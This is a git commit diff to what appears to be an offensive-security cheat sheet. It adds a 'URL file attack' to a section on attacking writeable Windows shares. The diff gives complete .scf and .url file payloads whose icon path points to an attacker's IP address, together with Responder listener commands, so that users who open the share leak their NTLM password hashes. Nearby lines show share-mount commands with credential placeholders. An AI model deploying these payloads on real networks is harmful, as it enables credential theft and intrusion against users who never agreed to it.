.url file in writeable share

This commit is contained in:
Swissky 2019-11-14 23:54:57 +01:00
parent 3a384c34aa
commit 639dc9faec

View File

@ -264,9 +264,9 @@ smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder
```
### SCF file attack against writeable share
### SCF and URL file attack against writeable share
Drop the following `something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
```powershell
[Shell]
@ -276,6 +276,17 @@ IconFile=\\10.10.XX.XX\Share\test.ico
Command=ToggleDesktop
```
This attack also works with `.url` files and `responder -I eth0 -v`.
```powershell
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.1.29\%USERNAME%.icon
IconIndex=1
```
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local